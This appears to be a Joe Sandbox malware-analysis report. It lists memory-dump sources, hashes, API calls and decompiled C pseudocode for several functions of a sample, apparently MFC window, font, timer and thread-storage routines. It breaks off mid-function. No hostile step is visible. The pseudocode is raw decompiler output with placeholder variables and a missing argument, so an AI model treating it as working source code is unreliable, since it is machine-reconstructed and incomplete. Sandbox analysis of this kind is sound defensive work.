                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: C1g9$Hw$P<Ex$Y[]C$[D`=$tN o$wRR|
                  • API String ID: 1029625771-1834093024
                  • Opcode ID: bdb2cefadae6ef4fc2f273e73e15e094e53ba162edcdad2d3eeaf8416322ddd9
                  • Instruction ID: 1f9c97793bf7886f3a15a817969de9b3796231bed9721534c4e49c1a09fea7d9
                  • Opcode Fuzzy Hash: bdb2cefadae6ef4fc2f273e73e15e094e53ba162edcdad2d3eeaf8416322ddd9
                  • Instruction Fuzzy Hash: AAD1B6B48063ACCBDB64CF829A887CDBB70BB15740F2086C9D1593B214DB750A86CF96
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 97%
                  			E0040A380(void* __ebx, signed int __ecx, void* __edi, signed int __esi, void* __eflags) {
                  				intOrPtr* _t34;
                  				intOrPtr _t36;
                  				int _t39;
                  				intOrPtr _t46;
                  				signed int _t57;
                  				signed int _t66;
                  				struct HWND__* _t71;
                  				void* _t72;
                  
                  				_t70 = __esi;
                  				_t58 = __ecx;
                  				_push(0x18);
                  				E00431A9B(E0044ACFA, __ebx, __edi, __esi);
                  				_t57 = __ecx;
                  				_t34 = __ecx + 0xb8;
                  				 *_t34 =  *_t34 + 1;
                  				if( *_t34 <= 1) {
                  					_t36 = E004105B2(__ecx, __ecx, __edi);
                  					 *((intOrPtr*)(_t72 - 0x10)) = _t36;
                  					_t77 = _t36;
                  					if(_t36 == 0) {
                  						L2:
                  						E00406436(_t57, _t58, 0, _t70, _t77);
                  					}
                  					 *(_t72 - 0x24) = 0x450028;
                  					 *((intOrPtr*)(_t72 - 0x20)) = 0;
                  					 *((intOrPtr*)(_t72 - 0x14)) = 0;
                  					 *((intOrPtr*)(_t72 - 0x18)) = 0;
                  					 *(_t72 - 0x1c) = 0;
                  					 *(_t72 - 4) = 0;
                  					_t71 = GetWindow(GetDesktopWindow(), 5);
                  					if(_t71 != 0) {
                  						do {
                  							_t39 = IsWindowEnabled(_t71);
                  							_t79 = _t39;
                  							if(_t39 != 0 && E0040EE68(_t58, 0, _t71, _t79, _t71) != 0 && E00408105( *((intOrPtr*)( *((intOrPtr*)(_t72 - 0x10)) + 0x20)), _t71) != 0 && SendMessageA(_t71, 0x36c, 0, 0) == 0) {
                  								EnableWindow(_t71, 0);
                  								_t58 = _t72 - 0x24;
                  								E00409F5C(_t72 - 0x24, _t71);
                  							}
                  							_t71 = GetWindow(_t71, 2);
                  						} while (_t71 != 0);
                  						_t70 =  *(_t72 - 0x1c);
                  						if(_t70 != 0) {
                  							_t86 = _t70 > 0;
                  							if(_t70 > 0) {
                  								goto L2;
                  							} else {
                  								_t66 = 4;
                  								_t46 = E00404461(_t86,  ~(0 | _t86 > 0x00000000) | (_t70 + 0x00000001) * _t66);
                  								_t58 = _t70 << 2;
                  								 *((intOrPtr*)(_t57 + 0xbc)) = _t46;
                  								 *((intOrPtr*)((_t70 << 2) + _t46)) = 0;
                  								if((0 |  *((intOrPtr*)(_t72 - 0x20)) != 0x00000000) == 0) {
                  									goto L2;
                  								} else {
                  									E004059F9(0, _t70,  *((intOrPtr*)(_t57 + 0xbc)), _t58,  *((intOrPtr*)(_t72 - 0x20)), _t58);
                  								}
                  							}
                  						}
                  					}
                  					 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
                  					_t34 = E00409F75(_t72 - 0x24);
                  				}
                  				return E00431B73(_t34);
                  			}












                  APIs
                  • __EH_prolog3.LIBCMT ref: 0040A387
                  • GetDesktopWindow.USER32 ref: 0040A3CA
                  • GetWindow.USER32(00000000), ref: 0040A3D1
                  • IsWindowEnabled.USER32(00000000), ref: 0040A3E2
                  • SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 0040A40E
                  • EnableWindow.USER32(00000000,00000000), ref: 0040A41A
                  • GetWindow.USER32(00000000,00000002), ref: 0040A42C
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$H_prolog3$DesktopEnableEnabledException@8MessageSendThrow
                  • String ID: (
                  • API String ID: 2907971239-3887548279
                  • Opcode ID: e63a990042588c24a6beb72bb7394faddda122b26c843fd20fc822a59a8eabbc
                  • Instruction ID: 3bb135bf242b6c09986745a0261cf98ccff5f01dbf2b9a6c7ca042f580c0f20a
                  • Opcode Fuzzy Hash: e63a990042588c24a6beb72bb7394faddda122b26c843fd20fc822a59a8eabbc
                  • Instruction Fuzzy Hash: 7D31C4359002209FDB11AF668C499AFBAB8FF45300F55453EE812BB1D1EB784D51CB6D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E004105DA(void* __ebx, void* __ecx, signed int _a4, long _a8) {
                  				struct HWND__* _v8;
                  				void* __edi;
                  				void* _t12;
                  				void* _t14;
                  				void* _t15;
                  				void* _t18;
                  				void* _t19;
                  				void* _t29;
                  				struct HWND__* _t30;
                  				signed int _t34;
                  				void* _t37;
                  				void* _t41;
                  
                  				_t29 = __ebx;
                  				_push(__ecx);
                  				_t37 = __ecx;
                  				_t12 = E004105B2(__ebx, __ecx, __ecx);
                  				_t34 = _a4 & 0x0000fff0;
                  				_t41 = _t12;
                  				_t14 = _t34 - 0xf040;
                  				if(_t14 == 0) {
                  					L11:
                  					if(_a8 != 0x75 || _t41 == 0) {
                  						L15:
                  						_t15 = 0;
                  						goto L16;
                  					} else {
                  						E00412C9D(_t41);
                  						L14:
                  						_t15 = 1;
                  						L16:
                  						return _t15;
                  					}
                  				}
                  				_t18 = _t14 - 0x10;
                  				if(_t18 == 0) {
                  					goto L11;
                  				}
                  				_t19 = _t18 - 0x10;
                  				if(_t19 == 0 || _t19 == 0xa0) {
                  					if(_t34 == 0xf060 || _a8 != 0) {
                  						if(_t41 != 0) {
                  							_push(_t29);
                  							_t30 =  *(_t37 + 0x20);
                  							_v8 = GetFocus();
                  							E0040EE3C(_t30, _t34, SetActiveWindow( *(_t41 + 0x20)));
                  							SendMessageA( *(_t41 + 0x20), 0x112, _a4, _a8);
                  							if(IsWindow(_t30) != 0) {
                  								SetActiveWindow(_t30);
                  							}
                  							if(IsWindow(_v8) != 0) {
                  								SetFocus(_v8);
                  							}
                  						}
                  					}
                  					goto L14;
                  				} else {
                  					goto L15;
                  				}
                  			}
















                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$ActiveFocus$MessageSend
                  • String ID: u
                  • API String ID: 1556911595-4067256894
                  • Opcode ID: 87418f2dc2a614755a69d5c0f0d4f683a1a68f3be1b47742967ac6949befff1e
                  • Instruction ID: b4a469e61909f79723e9443e387843b1e68923f1b743ae53d2218e8cd4b0e9e5
                  • Opcode Fuzzy Hash: 87418f2dc2a614755a69d5c0f0d4f683a1a68f3be1b47742967ac6949befff1e
                  • Instruction Fuzzy Hash: 1A11B432500205ABDB346F76CD08AEF7B65FBC4310F054436E905926A2DAB8CDE0DA98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E00429FF6(intOrPtr __ecx, signed int _a4) {
                  				signed int _v8;
                  				char _v40;
                  				void _v68;
                  				intOrPtr _v72;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t12;
                  				void* _t14;
                  				char* _t23;
                  				void* _t29;
                  				signed short _t30;
                  				struct HDC__* _t31;
                  				signed int _t32;
                  
                  				_t12 =  *0x463404; // 0x38a11573
                  				_v8 = _t12 ^ _t32;
                  				_t31 = GetStockObject;
                  				_t30 = 0xa;
                  				_v72 = __ecx;
                  				_t23 = "System";
                  				_t14 = GetStockObject(0x11);
                  				if(_t14 != 0) {
                  					L2:
                  					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
                  						_t23 =  &_v40;
                  						_t31 = GetDC(0);
                  						if(_v68 < 0) {
                  							_v68 =  ~_v68;
                  						}
                  						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
                  						ReleaseDC(0, _t31);
                  					}
                  					L6:
                  					_t16 = _a4;
                  					if(_a4 == 0) {
                  						_t16 = _t30 & 0x0000ffff;
                  					}
                  					return E00430650(E00429EA2(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
                  				}
                  				_t14 = GetStockObject(0xd);
                  				if(_t14 == 0) {
                  					goto L6;
                  				}
                  				goto L2;
                  			}


















                  APIs
                  • GetStockObject.GDI32(00000011), ref: 0042A01E
                  • GetStockObject.GDI32(0000000D), ref: 0042A026
                  • GetObjectA.GDI32(00000000,0000003C,?), ref: 0042A033
                  • GetDC.USER32(00000000), ref: 0042A042
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042A056
                  • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 0042A062
                  • ReleaseDC.USER32 ref: 0042A06E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Object$Stock$CapsDeviceRelease
                  • String ID: System
                  • API String ID: 46613423-3470857405
                  • Opcode ID: ad5c652a0884bd3402c9b71701d2c20a5e4dd9a1ca84ffed797b40bd404d96ca
                  • Instruction ID: 037f32019a4b5cb1b5665e51a4fb7870e81da93a7529e5481e8c2198bb38607a
                  • Opcode Fuzzy Hash: ad5c652a0884bd3402c9b71701d2c20a5e4dd9a1ca84ffed797b40bd404d96ca
                  • Instruction Fuzzy Hash: 2011B275B40228EBEB109FA2DC45FAF7B78FB55745F40002AFA01A7281DB749D01CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E00421287(intOrPtr* __ecx, intOrPtr _a4) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				struct tagPOINT _v20;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				short _t42;
                  				signed int _t49;
                  				struct HWND__* _t60;
                  				intOrPtr _t63;
                  				intOrPtr* _t64;
                  				intOrPtr _t66;
                  				void* _t68;
                  				void* _t72;
                  				intOrPtr* _t75;
                  				intOrPtr _t83;
                  				void* _t84;
                  				intOrPtr _t85;
                  				struct HWND__* _t87;
                  				intOrPtr _t88;
                  				intOrPtr* _t89;
                  
                  				_t76 = __ecx;
                  				_t89 = __ecx;
                  				_t42 = GetKeyState(1);
                  				_t90 = _t42;
                  				if(_t42 < 0) {
                  					return _t42;
                  				}
                  				_t85 = E0041F396(_t72, _t76, _t84, _t89, _t90);
                  				_v12 = _t85;
                  				GetCursorPos( &_v20);
                  				ScreenToClient( *(_t89 + 0x20),  &_v20);
                  				_t49 =  *((intOrPtr*)( *_t89 + 0x74))(_v20.x, _v20.y, 0, _t84, _t72);
                  				_v8 = _t49;
                  				if(_t49 < 0) {
                  					_t16 = _t85 + 0x4c;
                  					 *_t16 =  *(_t85 + 0x4c) | 0xffffffff;
                  					__eflags =  *_t16;
                  					L18:
                  					if(_v8 < 0) {
                  						L27:
                  						if( *(_v12 + 0x4c) == 0xffffffff) {
                  							KillTimer( *(_t89 + 0x20), 0xe001);
                  						}
                  						 *((intOrPtr*)( *_t89 + 0x178))(0xffffffff);
                  						L30:
                  						_t53 = 0xe000;
                  						if(_a4 == 0xe000) {
                  							_t53 = KillTimer( *(_t89 + 0x20), 0xe000);
                  							if(_v8 >= 0) {
                  								_t53 =  *((intOrPtr*)( *_t89 + 0x178))(_v8);
                  							}
                  						}
                  						return _t53;
                  					}
                  					ClientToScreen( *(_t89 + 0x20),  &_v20);
                  					_push(_v20.y);
                  					_t87 = WindowFromPoint(_v20);
                  					if(_t87 == 0) {
                  						L25:
                  						_t59 = _v12;
                  						_v8 = _v8 | 0xffffffff;
                  						 *(_t59 + 0x4c) =  *(_v12 + 0x4c) | 0xffffffff;
                  						L26:
                  						if(_v8 >= 0) {
                  							goto L30;
                  						}
                  						goto L27;
                  					}
                  					_t60 =  *(_t89 + 0x20);
                  					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
                  						goto L26;
                  					} else {
                  						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
                  						if(_t63 != 0) {
                  							_t63 =  *((intOrPtr*)(_t63 + 0x20));
                  						}
                  						if(_t63 == _t87) {
                  							goto L26;
                  						} else {
                  							goto L25;
                  						}
                  					}
                  				}
                  				_t64 = E004105B2(_t72, _t89, _t85);
                  				_t81 = _t89;
                  				_t75 = _t64;
                  				if(E004117D8(_t89) == 0) {
                  					L6:
                  					_v8 = _v8 | 0xffffffff;
                  					goto L7;
                  				} else {
                  					_t93 = _t75;
                  					if(_t75 == 0) {
                  						E00406436(_t75, _t81, _t85, _t89, _t93);
                  					}
                  					_t81 = _t75;
                  					if(E00412C5B(_t75) != 0) {
                  						L7:
                  						_t66 =  *((intOrPtr*)(_t85 + 0x3c));
                  						if(_t66 != 0) {
                  							_t88 =  *((intOrPtr*)(_t66 + 0x20));
                  						} else {
                  							_t88 = 0;
                  						}
                  						_t68 = E0040EE3C(_t75, _t81, GetCapture());
                  						if(_t68 != _t89) {
                  							if(_t68 != 0) {
                  								_t83 =  *((intOrPtr*)(_t68 + 0x20));
                  							} else {
                  								_t83 = 0;
                  							}
                  							if(_t83 != _t88 && E004105B2(_t75, _t68, _t88) == _t75) {
                  								_v8 = _v8 | 0xffffffff;
                  							}
                  						}
                  						goto L18;
                  					}
                  					goto L6;
                  				}
                  			}


























                  APIs
                  • GetKeyState.USER32(00000001), ref: 00421294
                  • GetCursorPos.USER32(?), ref: 004212B3
                  • ScreenToClient.USER32 ref: 004212C0
                  • GetCapture.USER32 ref: 00421316
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • ClientToScreen.USER32(?,?), ref: 0042135D
                  • WindowFromPoint.USER32(?,?), ref: 00421369
                  • IsChild.USER32(?,00000000), ref: 0042137E
                  • KillTimer.USER32(?,0000E001), ref: 004213BB
                  • KillTimer.USER32(?,0000E000), ref: 004213D7
                    • Part of subcall function 004117D8: GetForegroundWindow.USER32 ref: 004117EC
                    • Part of subcall function 004117D8: GetLastActivePopup.USER32(?), ref: 004117FD
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClientKillScreenTimerWindow$ActiveCaptureChildCursorException@8ForegroundFromH_prolog3LastPointPopupStateThrow
                  • String ID:
                  • API String ID: 1544770960-0
                  • Opcode ID: 4a07689c9db685bc27bb4ffb24f0be35f979112e1c51394de2fbae732337afbb
                  • Instruction ID: df39ac5b8854794e06a7082f429ff7eac5bcf5f3c278d8809952c039e30c033c
                  • Opcode Fuzzy Hash: 4a07689c9db685bc27bb4ffb24f0be35f979112e1c51394de2fbae732337afbb
                  • Instruction Fuzzy Hash: F641C631700215EFEB20DBA6DD44AAE7BB6BF54324F50066AE851D76B1EB38DD41CB08
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E004208A9(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t36;
                  				void* _t39;
                  				long _t41;
                  				void* _t42;
                  				long _t47;
                  				void* _t53;
                  				signed int _t55;
                  				long* _t62;
                  				struct _CRITICAL_SECTION* _t64;
                  				void* _t65;
                  				void* _t66;
                  
                  				_push(0x10);
                  				E00431ACE(E0044BED8, __ebx, __edi, __esi);
                  				_t62 = __ecx;
                  				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
                  				_t64 = __ecx + 0x1c;
                  				 *(_t66 - 0x14) = _t64;
                  				EnterCriticalSection(_t64);
                  				_t36 =  *(_t66 + 8);
                  				if(_t36 <= 0 || _t36 >= _t62[3]) {
                  					_push(_t64);
                  				} else {
                  					_t65 = TlsGetValue( *_t62);
                  					if(_t65 == 0) {
                  						 *(_t66 - 4) = 0;
                  						_t39 = E00420529(0x10);
                  						__eflags = _t39;
                  						if(__eflags == 0) {
                  							_t65 = 0;
                  							__eflags = 0;
                  						} else {
                  							 *_t39 = 0x453424;
                  							_t65 = _t39;
                  						}
                  						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
                  						_t51 =  &(_t62[5]);
                  						 *(_t65 + 8) = 0;
                  						 *(_t65 + 0xc) = 0;
                  						E0042065B( &(_t62[5]), _t65);
                  						goto L5;
                  					} else {
                  						_t55 =  *(_t66 + 8);
                  						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
                  							L5:
                  							_t75 =  *(_t65 + 0xc);
                  							if( *(_t65 + 0xc) != 0) {
                  								_t41 = E004148C1(_t51, __eflags, _t62[3], 4);
                  								_t53 = 2;
                  								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
                  							} else {
                  								_t47 = E004148C1(_t51, _t75, _t62[3], 4);
                  								_pop(_t53);
                  								_t42 = LocalAlloc(0, _t47);
                  							}
                  							_t76 = _t42;
                  							if(_t42 == 0) {
                  								LeaveCriticalSection( *(_t66 - 0x14));
                  								_t42 = E004063FE(0, _t53, _t62, _t65, _t76);
                  							}
                  							 *(_t65 + 0xc) = _t42;
                  							E00431160(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
                  							 *(_t65 + 8) = _t62[3];
                  							TlsSetValue( *_t62, _t65);
                  							_t55 =  *(_t66 + 8);
                  						}
                  					}
                  					_t36 =  *(_t65 + 0xc);
                  					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
                  						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
                  					}
                  					_push( *(_t66 - 0x14));
                  				}
                  				LeaveCriticalSection();
                  				return E00431B73(_t36);
                  			}















                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 004208B0
                  • EnterCriticalSection.KERNEL32(?,00000010,00420B6C,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 004208C1
                  • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 004208DF
                  • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 00420913
                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 0042097F
                  • _memset.LIBCMT ref: 0042099E
                  • TlsSetValue.KERNEL32(?,00000000,0041F372,00406452,00411FA3), ref: 004209AF
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 004209D0
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                  • String ID:
                  • API String ID: 1891723912-0
                  • Opcode ID: 7f57efcd963ca449d36f0365ecac5dd69b34fcef90cf9d521c33b0f43bbe3d9f
                  • Instruction ID: 5362d1717d03bc6381155a69efb60a9799305f1a3338e288a41fad99fcfcfd1f
                  • Opcode Fuzzy Hash: 7f57efcd963ca449d36f0365ecac5dd69b34fcef90cf9d521c33b0f43bbe3d9f
                  • Instruction Fuzzy Hash: 683192B5600616AFEB20AF11E881D6AB7F4FF44310B50C52FF51797662C774A990CF88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 82%
                  			E004289FF(void* __esi, char* _a4, CHAR* _a8) {
                  				signed int _v8;
                  				short _v528;
                  				short _v1048;
                  				short _v1568;
                  				int _v1572;
                  				char* _v1576;
                  				void* __ebx;
                  				void* __edi;
                  				signed int _t20;
                  				int _t23;
                  				void* _t26;
                  				char* _t35;
                  				CHAR* _t38;
                  				void* _t39;
                  				int _t40;
                  				void* _t45;
                  				char* _t47;
                  				void* _t48;
                  				void* _t52;
                  				signed int _t55;
                  				signed int _t57;
                  
                  				_t49 = __esi;
                  				_t55 = _t57;
                  				_t20 =  *0x463404; // 0x38a11573
                  				_v8 = _t20 ^ _t55;
                  				_t38 = _a8;
                  				_t47 = _a4;
                  				_v1576 = _t38;
                  				if(lstrcmpiA(_t47, _t38) == 0) {
                  					_t23 = GetSystemMetrics(0x2a);
                  					if(_t23 != 0) {
                  						_push(__esi);
                  						_v1572 = lstrlenA(_t47);
                  						if(_v1572 != lstrlenA(_t38)) {
                  							L14:
                  							_t26 = 0;
                  						} else {
                  							_t40 = GetThreadLocale();
                  							GetStringTypeA(_t40, 1, _t47, 0xffffffff,  &_v1568);
                  							GetStringTypeA(_t40, 4, _t47, 0xffffffff,  &_v528);
                  							GetStringTypeA(_t40, 1, _v1576, 0xffffffff,  &_v1048);
                  							_t35 = _t47;
                  							if( *_t47 == 0) {
                  								L11:
                  								_t26 = 1;
                  							} else {
                  								_t52 = 0;
                  								while(( *(_t55 + _t52 - 0x20c) & 0x00000080) == 0 ||  *((intOrPtr*)(_t55 + _t52 - 0x61c)) ==  *((intOrPtr*)(_t55 + _t52 - 0x414))) {
                  									_t52 = _t52 + 2;
                  									if( *_t35 != 0) {
                  										continue;
                  									} else {
                  										goto L11;
                  									}
                  									goto L12;
                  								}
                  								goto L14;
                  							}
                  						}
                  						L12:
                  						_pop(_t49);
                  					} else {
                  						_t26 = _t23 + 1;
                  					}
                  				} else {
                  					_t26 = 0;
                  				}
                  				_pop(_t48);
                  				_pop(_t39);
                  				return E00430650(_t26, _t39, _v8 ^ _t55, _t45, _t48, _t49);
                  			}

























                  APIs
                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,?), ref: 00428A24
                  • GetSystemMetrics.USER32 ref: 00428A37
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsSystemlstrcmpi
                  • String ID:
                  • API String ID: 2335526769-0
                  • Opcode ID: e080c02de74fd4b82b430f72ec3c9409b302c346e750a8042bb942049da280ed
                  • Instruction ID: 79ccf1a60a629e09d7d33ca9d5b2f7e3e78f3aa6161d4a5aaa64ec7c091d6d26
                  • Opcode Fuzzy Hash: e080c02de74fd4b82b430f72ec3c9409b302c346e750a8042bb942049da280ed
                  • Instruction Fuzzy Hash: 47210E717012286BDB205F65AC44F9F7BACEB89720F5006BBF916D21C1DEB49D41CB68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E0041804C(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short* __esi, void* __eflags) {
                  				signed int _t83;
                  				intOrPtr _t85;
                  				void* _t91;
                  				intOrPtr _t96;
                  				CHAR** _t98;
                  				signed int _t101;
                  				signed int _t103;
                  				signed int _t108;
                  				intOrPtr _t110;
                  				CHAR** _t117;
                  				int _t120;
                  				CHAR** _t122;
                  				int _t125;
                  				signed int _t126;
                  				void* _t130;
                  				void* _t135;
                  				void* _t148;
                  				signed int _t150;
                  				void* _t152;
                  				signed short* _t156;
                  
                  				_t151 = __esi;
                  				_t148 = __edx;
                  				_t131 = __ecx;
                  				_push(0x188);
                  				E00431A9B(E0044B616, __ebx, __edi, __esi);
                  				_t130 = __ecx;
                  				_t150 = 0;
                  				 *(_t152 - 0x10) = 0;
                  				if( *((intOrPtr*)(_t152 + 8)) != 0) {
                  					L29:
                  					_push(_t150);
                  					_push(0x14000c);
                  					_push(1);
                  					E0042A201(_t130, _t152 - 0x194, _t150, _t151, __eflags);
                  					 *(_t152 - 4) = 3;
                  					E0042A489(_t152 - 0x194);
                  					_t83 =  *(_t130 + 0x70);
                  					__eflags = _t83 - _t150;
                  					if(_t83 != _t150) {
                  						E0041FD19(_t83);
                  					}
                  					_t84 =  *(_t130 + 0x74);
                  					__eflags =  *(_t130 + 0x74) - _t150;
                  					if(__eflags != 0) {
                  						E0041FD19(_t84);
                  					}
                  					_t85 =  *((intOrPtr*)(_t152 - 0x120));
                  					 *(_t130 + 0x70) =  *(_t85 + 8);
                  					 *(_t130 + 0x74) =  *(_t85 + 0xc);
                  					 *((intOrPtr*)(_t152 - 0x194)) = 0x452264;
                  					_t76 = _t152 - 0x194; // 0x452264
                  					_t135 = _t76;
                  					L34:
                  					 *(_t152 - 4) =  *(_t152 - 4) | 0xffffffff;
                  					_t87 = E004174FB(_t135, _t150, _t151,  *(_t152 - 4));
                  					L35:
                  					return E00431B73(_t87);
                  				}
                  				_t91 =  *(__ecx + 0x74);
                  				if(_t91 == 0) {
                  					goto L29;
                  				}
                  				_t151 = GlobalLock(_t91);
                  				_t156 = _t151;
                  				_t87 = 0 | _t156 == 0x00000000;
                  				_t157 = _t156 == 0;
                  				if(_t156 == 0) {
                  					_t87 = E00406436(_t130, _t131, 0, _t151, _t157);
                  				}
                  				_t158 = _t151[3] & 0x00000001;
                  				if((_t151[3] & 0x00000001) == 0) {
                  					goto L35;
                  				}
                  				_push(_t150);
                  				_push(0x14000c);
                  				_push(1);
                  				E0042A201(_t130, _t152 - 0xd8, _t150, _t151, _t158);
                  				 *(_t152 - 4) = _t150;
                  				if(E0042A489(_t152 - 0xd8) != 0) {
                  					_t96 =  *((intOrPtr*)(_t152 - 0x64));
                  					__eflags =  *((intOrPtr*)(_t96 + 0xc)) - _t150;
                  					if( *((intOrPtr*)(_t96 + 0xc)) != _t150) {
                  						_t98 = E0042A49C(_t152 - 0xd8, _t152 - 0x18);
                  						_t150 = lstrcmpA;
                  						 *(_t152 - 4) = 1;
                  						 *(_t152 - 0x10) = 1;
                  						_t101 = lstrcmpA(_t151 + ( *_t151 & 0x0000ffff),  *_t98);
                  						__eflags = _t101;
                  						if(_t101 != 0) {
                  							L14:
                  							 *((char*)(_t152 + 0xb)) = 1;
                  							L15:
                  							__eflags =  *(_t152 - 0x10) & 0x00000004;
                  							if(( *(_t152 - 0x10) & 0x00000004) != 0) {
                  								 *(_t152 - 0x10) =  *(_t152 - 0x10) & 0xfffffffb;
                  								__eflags =  *((intOrPtr*)(_t152 - 0x1c)) + 0xfffffff0;
                  								E004010B0( *((intOrPtr*)(_t152 - 0x1c)) + 0xfffffff0, _t148);
                  							}
                  							__eflags =  *(_t152 - 0x10) & 0x00000002;
                  							if(( *(_t152 - 0x10) & 0x00000002) != 0) {
                  								 *(_t152 - 0x10) =  *(_t152 - 0x10) & 0xfffffffd;
                  								__eflags =  *((intOrPtr*)(_t152 - 0x14)) + 0xfffffff0;
